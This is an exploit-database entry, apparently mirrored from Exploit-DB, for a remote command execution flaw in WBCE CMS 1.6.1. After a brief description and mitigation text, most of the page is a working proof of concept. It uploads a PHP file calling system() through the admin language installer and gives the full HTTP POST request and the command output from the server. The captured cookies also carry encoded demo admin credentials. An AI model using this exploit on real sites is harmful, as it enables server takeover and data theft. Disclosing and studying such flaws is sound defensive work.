header-logo
Suggest Exploit
vendor:
WBCE CMS
by:
tmrswrr
6.1
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: WBCE CMS
Affected Version From: 1.6.2001
Affected Version To: 1.6.2001
Patch Exists: NO
Related CWE: CVE-2023-XXXXX
CPE: a:wbce:wbce_cms:1.6.1
Metasploit:
Other Scripts:
Platforms Tested:
2023

WBCE CMS Version 1.6.1 Remote Command Execution

WBCE CMS version 1.6.1 is vulnerable to remote command execution. By uploading a malicious file and triggering its execution through the language installation feature, an attacker can execute arbitrary commands on the server. This can lead to unauthorized access, data theft, and other malicious activities. This vulnerability has been assigned CVE-2023-XXXXX.

Mitigation:

To mitigate this vulnerability, users should update to the latest version of WBCE CMS and avoid uploading files with untrusted content. Additionally, restricting access to the language installation feature can help prevent exploitation.
Source

Exploit-DB raw data:

# Exploit Title: WBCE CMS Version : 1.6.1  Remote Command Execution
# Date: 30/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip
# Version: 1.6.1
# Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS

## POC:

1 ) Login with admin cred and click Add-ons
2 ) Click on Language > Install Language  > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php
3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php
4 ) You will be see id command result 

Result: 

uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) 

### Post Request:

POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1
Host: demos6.softaculous.com
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php
Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459
Content-Length: 522
Origin: https://demos6.softaculous.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------86020911415982314764024459
Content-Disposition: form-data; name="formtoken"

5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c
-----------------------------86020911415982314764024459
Content-Disposition: form-data; name="userfile"; filename="upgrade.php"
Content-Type: application/x-php

<?php echo system('id'); ?>

-----------------------------86020911415982314764024459
Content-Disposition: form-data; name="submit"


-----------------------------86020911415982314764024459--

### Response : 

<!-- ################### Up from here: Original Code from original template ########### -->

<!-- senseless positioning-table: needed for old modules which base on class td.content -->
<div class="row" style="overflow:visible">
<div class="fg12">
<table id="former_positioning_table">
<tr>
    <td class="content">
uid=1000(soft) gid=1000(soft) groups=1000(soft)
uid=1000(soft) gid=1000(soft) groups=1000(soft)
    <div class="top alertbox_error fg12 error-box">
        <i class=" fa fa-2x fa-warning signal"></i>

                    <p>Invalid WBCE CMS language file. Please check the text file.</p>
        
                    <p><a href="index.php" class="button">Back

Navigation

Suggest Exploit

Services By CQR